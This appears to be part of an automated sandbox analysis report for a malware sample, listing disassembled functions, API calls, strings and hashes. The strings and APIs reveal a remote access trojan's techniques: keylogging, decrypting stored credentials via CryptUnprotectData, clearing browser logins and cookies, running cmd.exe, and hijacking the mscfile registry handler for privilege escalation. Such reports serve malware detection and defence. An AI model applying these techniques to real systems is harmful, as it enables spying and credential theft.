                                                                                            • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                          • _wcslen.LIBCMT ref: 00419744
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                          • String ID: .exe$program files (x86)\$program files\
                                                                                          • API String ID: 37874593-1203593143
                                                                                          • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                                                                          • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                                                                          • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                                                                          • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                                                                          Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                                                                          • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                                                                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                          • String ID: Offline Keylogger Started
                                                                                          • API String ID: 465354869-4114347211
                                                                                          • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                                                                          • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                                                                          • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                                                                          • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                                                                          Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                          • String ID: Online Keylogger Started
                                                                                          • API String ID: 112202259-1258561607
                                                                                          • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                                                                          • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                                                                          • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                                                                          • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                                                                          Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?), ref: 00404F61
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                                                                                          Strings
                                                                                          • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                          • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 2532271599-507513762
                                                                                          • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                                                                          • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                                                                          • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                                                                          • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                                                                          Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                          • API String ID: 2574300362-2380590389
                                                                                          • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                                          • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                                                                          • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                                          • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                                                                          Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                                                                          • CloseHandle.KERNEL32(?), ref: 004051AA
                                                                                          • SetEvent.KERNEL32(?), ref: 004051B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                          • String ID: Connection Timeout
                                                                                          • API String ID: 2055531096-499159329
                                                                                          • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                                                                          • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                                                                          • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                                                                          • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                                                                          Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                          • API String ID: 2005118841-1866435925
                                                                                          • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                                                                          • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                                                                          • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                                                                          • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                                                                          Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: origmsc
                                                                                          • API String ID: 3677997916-68016026
                                                                                          • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                                                                          • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                                                                          • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                                                                          • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                                                                                          Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID: /C $cmd.exe$open
                                                                                          • API String ID: 587946157-3896048727
                                                                                          • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                                                                          • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                                                                          • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                                                                          • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                                                                          Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                          Strings
                                                                                          • http\shell\open\command, xrefs: 00412026
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: http\shell\open\command
                                                                                          • API String ID: 3677997916-1487954565
                                                                                          • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                                                                          • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                                                                          • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                                                                          • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                                                                          Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                                                                                          • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                                                                                          • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                                                                                          Strings
                                                                                          • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue
                                                                                          • String ID: Software\Classes\mscfile\shell\open\command
                                                                                          • API String ID: 1818849710-505396733
                                                                                          • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                                                                          • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                                                                          • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                                                                          • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                                                                          Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                                                            • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                                                            • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                          • String ID: bad locale name
                                                                                          • API String ID: 3628047217-1405518554
                                                                                          • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                                                                          • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                                                                          • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                                                                          • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                                                                          Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                                          • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue
                                                                                          • String ID: P0F
                                                                                          • API String ID: 1818849710-3540264436
                                                                                          • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                                          • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                                                                          • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                                          • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                                                                          Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetCursorInfo$User32.dll
                                                                                          • API String ID: 1646373207-2714051624
                                                                                          • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                                          • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                                                                          • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                                          • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                                                                          Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                                          • API String ID: 2574300362-1519888992
                                                                                          • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                                          • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                                                                          • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                                          • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                                                                          Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __alldvrm$_strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1036877536-0
                                                                                          • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                                                                          • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                                                                          • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                                                                          • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                                                                          Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                                          • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                                                                          • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                                          • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                                                                          Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                                                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3360349984-0
                                                                                          • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                                                                                          • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                                                                          • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                                                                                          • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                                                                          Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Cleared browsers logins and cookies., xrefs: 0040B036
                                                                                          • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                          • API String ID: 3472027048-1236744412
                                                                                          • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                                                                          • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                                                                          • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                                                                          • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                                                                          Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                                                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                                                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                          • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQuerySleepValue
                                                                                          • String ID: H"G$exepath$!G
                                                                                          • API String ID: 4119054056-2148977334
                                                                                          • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                                                                          • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                                                                          • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                                                                          • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                                                                          Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                                                            • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                                                            • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040955A
                                                                                          • Sleep.KERNEL32(00000064), ref: 004095F5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                          • String ID: [ $ ]
                                                                                          • API String ID: 3309952895-93608704
                                                                                          • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
